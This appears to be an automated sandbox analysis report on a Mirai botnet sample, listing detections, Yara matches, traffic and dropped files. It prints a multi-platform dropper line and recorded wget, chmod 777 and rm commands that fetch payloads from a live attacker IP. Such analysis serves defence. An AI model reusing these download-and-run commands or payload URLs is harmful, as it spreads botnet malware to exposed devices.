Linux Analysis Report

Overview

General Information

Analysis ID: 1427772
Infos:

Detection

Mirai
Score: 76
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Yara detected Mirai
Performs DNS queries to domains with low reputation
Sample deletes itself
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "wget" command typically used for HTTP/S downloading
Found strings indicative of a multi-platform dropper
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Mirai Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection
barindex
Antivirus detection for dropped file
Source: /tmp/lib Avira: detection malicious, Label: EXP/ELF.Agent.J.12
Found strings indicative of a multi-platform dropper
Source: lib.24.dr String: /proc/self/exe/proc//exe/cmdlineld.sowgettftpcurl/proc
Source: shk.14.dr String: cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip

Networking
barindex
Performs DNS queries to domains with low reputation
Source: DNS query: rootme.xyz
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57410
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57412
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57414
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57416
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57418
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57420
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57424
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57426
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57428
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57430
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:42738 -> 45.128.232.208:33335
Executes the "wget" command typically used for HTTP/S downloading
Source: /bin/sh (PID: 6224) Wget executable: /usr/bin/wget -> wget http://103.163.214.97/shk Jump to behavior
Source: /bin/sh (PID: 6229) Wget executable: /usr/bin/wget -> wget http://103.163.214.97/mips -O lib Jump to behavior
Sample listens on a socket
Source: /tmp/lib (PID: 6231) Socket: 127.0.0.1::33337 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: unknown TCP traffic detected without corresponding DNS query: 103.163.214.97
Source: global traffic HTTP traffic detected: GET /shk HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 103.163.214.97Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mips HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 103.163.214.97Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: rootme.xyz
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 6231.1.00007f20f8400000.00007f20f841d000.r-x.sdmp, type: MEMORY Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: /tmp/lib, type: DROPPED Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Sample tries to kill a process (SIGKILL)
Source: /tmp/lib (PID: 6231) SIGKILL sent: pid: 788, result: successful Jump to behavior
Source: /tmp/lib (PID: 6231) SIGKILL sent: pid: 884, result: successful Jump to behavior
Source: /tmp/lib (PID: 6231) SIGKILL sent: pid: 2096, result: successful Jump to behavior
Source: /tmp/lib (PID: 6231) SIGKILL sent: pid: 2102, result: successful Jump to behavior
Yara signature match
Source: 6231.1.00007f20f8400000.00007f20f841d000.r-x.sdmp, type: MEMORY Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: /tmp/lib, type: DROPPED Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: classification engine Classification label: mal76.troj.evad.lin@0/2@1/0
Enumerates processes within the "proc" file system
Source: /tmp/lib (PID: 6231) File opened: /proc/1582/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/3088/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/230/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/110/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/231/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/111/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/232/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1579/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/112/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/233/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1699/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/113/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/234/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1335/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1698/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/114/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/235/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1334/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1576/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/2302/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/115/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/236/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/116/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/237/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/117/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/118/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/910/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/119/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/912/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/10/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/2307/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/11/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/918/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/12/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/13/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/14/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/15/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/16/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/17/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/18/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1594/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/120/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/121/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1349/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/122/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/243/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/123/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/2/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/124/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/3/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/4/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/125/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/126/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1344/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1465/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1586/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/127/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/6/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/248/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/128/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/249/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1463/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/800/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/9/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/801/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/20/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/21/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1900/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/22/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/23/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/24/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/25/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/26/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/27/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/28/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/29/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/491/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/250/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/130/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/251/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/252/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/132/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/253/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/254/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/255/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/256/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1599/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/257/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1477/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/379/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/258/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1476/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/259/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1475/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/4500/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/936/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/30/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/2208/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/35/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1809/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/1494/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/260/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/261/exe Jump to behavior
Source: /tmp/lib (PID: 6231) File opened: /proc/141/exe Jump to behavior
Executes the "chmod" command used to modify permissions
Source: /bin/sh (PID: 6225) Chmod executable: /usr/bin/chmod -> chmod 777 shk Jump to behavior
Source: /bin/sh (PID: 6230) Chmod executable: /usr/bin/chmod -> chmod 777 lib Jump to behavior
Executes the "rm" command used to delete files or directories
Source: /bin/sh (PID: 6223) Rm executable: /usr/bin/rm -> rm -rf shk Jump to behavior
Source: /bin/sh (PID: 6227) Rm executable: /usr/bin/rm -> rm -rf lib Jump to behavior
Source: /bin/sh (PID: 6228) Rm executable: /usr/bin/rm -> rm -rf mips Jump to behavior
Source: /bin/sh (PID: 6241) Rm executable: /usr/bin/rm -> rm -rf lib Jump to behavior
Source: /bin/sh (PID: 6242) Rm executable: /usr/bin/rm -> rm -rf shk Jump to behavior
Executes the "wget" command typically used for HTTP/S downloading
Source: /bin/sh (PID: 6224) Wget executable: /usr/bin/wget -> wget http://103.163.214.97/shk Jump to behavior
Source: /bin/sh (PID: 6229) Wget executable: /usr/bin/wget -> wget http://103.163.214.97/mips -O lib Jump to behavior
Sample tries to set the executable flag
Source: /usr/bin/chmod (PID: 6225) File: /tmp/shk (bits: - usr: rwx grp: rwx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 6230) File: /tmp/lib (bits: - usr: rwx grp: rwx all: rwx) Jump to behavior
Sets full permissions to files and/or directories
Source: /bin/sh (PID: 6225) Chmod executable with 777: /usr/bin/chmod -> chmod 777 shk Jump to behavior
Source: /bin/sh (PID: 6230) Chmod executable with 777: /usr/bin/chmod -> chmod 777 lib Jump to behavior
Writes ELF files to disk
Source: /usr/bin/wget (PID: 6229) File written: /tmp/lib Jump to dropped file
Source: submitted sample Stderr: --2024-04-18 06:51:19-- http://103.163.214.97/shkConnecting to 103.163.214.97:80... connected.HTTP request sent, awaiting response... 200 OKLength: 474Saving to: shk 0K 100% 512K=0.001s2024-04-18 06:51:20 (512 KB/s) - shk saved [474/474]--2024-04-18 06:51:20-- http://103.163.214.97/mipsConnecting to 103.163.214.97:80... connected.HTTP request sent, awaiting response... 200 OKLength: 120280 (117K)Saving to: lib 0K .......... .......... .......... .......... .......... 42% 72.1K 1s 50K .......... .......... .......... .......... .......... 85% 145K 0s 100K .......... ....... 100% 528K=1.1s2024-04-18 06:51:22 (110 KB/s) - lib saved [120280/120280]: exit code = 0

Hooking and other Techniques for Hiding and Protection
barindex
Sample deletes itself
Source: /usr/bin/rm (PID: 6227) File: /tmp/lib Jump to behavior
Source: /usr/bin/rm (PID: 6241) File: /tmp/lib Jump to behavior
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57410
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57412
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57414
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57416
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57418
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57420
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57424
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57426
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57428
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 57430
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/lib (PID: 6231) Queries kernel information via 'uname': Jump to behavior
Source: sh, 6231.1.00005597771ec000.0000559777294000.rw-.sdmp, lib, 6231.1.00005597771ec000.0000559777294000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mips
Source: sh, 6231.1.00007ffeeadad000.00007ffeeadce000.rw-.sdmp, lib, 6231.1.00007ffeeadad000.00007ffeeadce000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-mips./libtplinkSUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/tmpCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./lib
Source: sh, 6231.1.00007ffeeadad000.00007ffeeadce000.rw-.sdmp, lib, 6231.1.00007ffeeadad000.00007ffeeadce000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mips
Source: sh, 6231.1.00005597771ec000.0000559777294000.rw-.sdmp, lib, 6231.1.00005597771ec000.0000559777294000.rw-.sdmp Binary or memory string: U1!/etc/qemu-binfmt/mips

Stealing of Sensitive Information
barindex
Yara detected Mirai
Source: Yara match File source: 6231.1.00007f20f8400000.00007f20f841d000.r-x.sdmp, type: MEMORY
Source: Yara match File source: /tmp/lib, type: DROPPED

Remote Access Functionality
barindex
Yara detected Mirai
Source: Yara match File source: 6231.1.00007f20f8400000.00007f20f841d000.r-x.sdmp, type: MEMORY
Source: Yara match File source: /tmp/lib, type: DROPPED

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
9.10.243.173
 unknown United States
3356 LEVEL3US false
131.85.31.95
 unknown United States
140 DNIC-AS-00140US false
90.221.63.94
 unknown United Kingdom
5607 BSKYB-BROADBAND-ASGB false
18.132.133.131
 unknown United States
16509 AMAZON-02US false
153.74.120.23
 unknown United States
14962 NCR-252US false
139.99.9.194
 unknown Canada
16276 OVHFR false
36.13.74.222
 unknown Japan 2516 KDDIKDDICORPORATIONJP false
186.131.187.183
 unknown Argentina
22927 TelefonicadeArgentinaAR false
104.112.146.190
 unknown United States
28573 CLAROSABR false
123.139.39.205
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
82.149.106.134
 unknown Austria
8559 WELLCOMKabelplusGmbHvormalsBnetWellcomAT false
103.42.115.36
 unknown India
133668 EIKON-AS-INEikonTechnologiesIN false
50.209.198.108
 unknown United States
7922 COMCAST-7922US false
159.25.118.169
 unknown Germany
5517 CSLDE false
123.146.86.5
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
48.207.173.142
 unknown United States
2686 ATGS-MMD-ASUS false
205.38.105.88
 unknown United States
2914 NTT-COMMUNICATIONS-2914US false
156.125.113.21
 unknown United States
393504 XNSTGCA false
120.73.207.199
 unknown Korea Republic of
9761 KUMHO-ASKUMHOKR false
11.72.61.0
 unknown United States
3356 LEVEL3US false
1.162.202.96
 unknown Taiwan; Republic of China (ROC)
3462 HINETDataCommunicationBusinessGroupTW false
203.255.30.174
 unknown Korea Republic of
18028 GSNU-AS-KRGyeongSangNationalUniversityKR false
16.8.36.136
 unknown United States
unknown unknown false
82.115.89.251
 unknown Poland
16340 IS-ASNIS-NETAutonomousSystemPL false
81.156.220.237
 unknown United Kingdom
2856 BT-UK-ASBTnetUKRegionalnetworkGB false
246.40.79.116
 unknown Reserved
unknown unknown false
3.231.152.13
 unknown United States
14618 AMAZON-AESUS false
160.24.156.85
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
155.181.207.79
 unknown United States
37532 ZAMRENZM false
221.3.179.91
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
23.173.252.91
 unknown Reserved
397672 AS-WYOMINGWIRELESSUS false
106.55.89.238
 unknown China
45090 CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa false
219.168.146.109
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
31.215.25.247
 unknown United Arab Emirates
5384 EMIRATES-INTERNETEmiratesInternetAE false
244.163.79.127
 unknown Reserved
unknown unknown false
92.236.242.219
 unknown United Kingdom
5089 NTLGB false
173.217.65.90
 unknown United States
19108 SUDDENLINK-COMMUNICATIONSUS false
59.119.224.162
 unknown Taiwan; Republic of China (ROC)
3462 HINETDataCommunicationBusinessGroupTW false
60.93.218.94
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
49.87.160.3
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
26.153.48.8
 unknown United States
7922 COMCAST-7922US false
157.69.76.188
 unknown Japan 4713 OCNNTTCommunicationsCorporationJP false
54.153.180.142
 unknown United States
16509 AMAZON-02US false
83.130.231.130
 unknown Israel
9116 GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSyste false
51.19.158.134
 unknown United Kingdom
5607 BSKYB-BROADBAND-ASGB false
39.148.103.122
 unknown China
24445 CMNET-V4HENAN-AS-APHenanMobileCommunicationsCoLtdCN false
57.157.171.70
 unknown Belgium
2686 ATGS-MMD-ASUS false
241.193.244.154
 unknown Reserved
unknown unknown false
182.81.184.225
 unknown China
23771 SXBCTV-APSXBCTVInternetServiceProviderCN false
5.97.46.21
 unknown Italy
3269 ASN-IBSNAZIT false
82.244.243.72
 unknown France
12322 PROXADFR false
105.179.156.81
 unknown unknown
37228 Olleh-Rwanda-NetworksRW false
193.57.230.97
 unknown United Kingdom
204928 OSP-US-01US false
187.100.242.241
 unknown Brazil
27699 TELEFONICABRASILSABR false
59.46.195.34
 unknown China
134762 CHINANET-LIAONING-DALIAN-MANCHINANETLiaoningprovinceDali false
249.113.168.67
 unknown Reserved
unknown unknown false
249.17.142.164
 unknown Reserved
unknown unknown false
150.3.150.178
 unknown Japan 6400 CompaniaDominicanadeTelefonosSADO false
162.236.213.239
 unknown United States
7018 ATT-INTERNET4US false
13.34.40.148
 unknown United States
7018 ATT-INTERNET4US false
219.240.131.59
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR false
66.244.47.169
 unknown United States
23483 SHASTACOEUS false
139.200.181.138
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
39.52.74.222
 unknown Pakistan
45595 PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPK false
98.12.84.202
 unknown United States
12271 TWC-12271-NYCUS false
19.55.110.191
 unknown United States
3 MIT-GATEWAYSUS false
132.60.152.230
 unknown United States
385 AFCONC-BLOCK1-ASUS false
115.103.189.162
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
43.236.194.42
 unknown China
17506 UCOMARTERIANetworksCorporationJP false
46.184.123.95
 unknown Saudi Arabia
48695 ATHEEB-ASSA false
97.41.214.195
 unknown United States
22394 CELLCOUS false
246.180.127.246
 unknown Reserved
unknown unknown false
124.51.209.73
 unknown Korea Republic of
17858 POWERVIS-AS-KRLGPOWERCOMMKR false
160.166.18.133
 unknown Morocco
6713 IAM-ASMA false
194.84.69.8
 unknown Russian Federation
2854 ROSPRINT-ASRU false
126.245.208.200
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
76.225.140.136
 unknown United States
7018 ATT-INTERNET4US false
181.120.33.225
 unknown Paraguay
23201 TelecelSAPY false
168.147.239.181
 unknown United States
27435 OPSOURCE-INCUS false
219.20.81.39
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
100.96.139.43
 unknown Reserved
701 UUNETUS false
66.227.52.253
 unknown United States
3257 GTT-BACKBONEGTTDE false
104.73.152.206
 unknown United States
16625 AKAMAI-ASUS false
53.31.14.154
 unknown Germany
31399 DAIMLER-ASITIGNGlobalNetworkDE false
154.104.82.55
 unknown Tunisia
37693 TUNISIANATN false
63.70.239.187
 unknown United States
701 UUNETUS false
90.35.72.23
 unknown France
3215 FranceTelecom-OrangeFR false
156.1.114.162
 unknown United States
22226 SFUSDUS false
252.192.131.106
 unknown Reserved
unknown unknown false
59.57.245.23
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
132.50.12.107
 unknown United States
385 AFCONC-BLOCK1-ASUS false
163.23.222.138
 unknown Taiwan; Republic of China (ROC)
1659 ERX-TANET-ASN1TaiwanAcademicNetworkTANetInformationC false
116.72.42.170
 unknown India
17488 HATHWAY-NET-APHathwayIPOverCableInternetIN false
179.97.186.103
 unknown Brazil
19182 TELEFONICABRASILSABR false
116.220.194.108
 unknown Japan 9824 JTCL-JP-ASJupiterTelecommunicationCoLtdJP false
92.57.255.252
 unknown Spain
12479 UNI2-ASES false
105.86.121.35
 unknown Egypt
36992 ETISALAT-MISREG false
97.130.128.26
 unknown United States
6167 CELLCO-PARTUS false
140.168.62.184
 unknown Australia
15199 WWUUS false
118.89.115.17
 unknown China
45090 CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa false

Contacted Domains

Name IP Active
rootme.xyz 45.128.232.208 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://103.163.214.97/mips false unknown
http://103.163.214.97/shk false unknown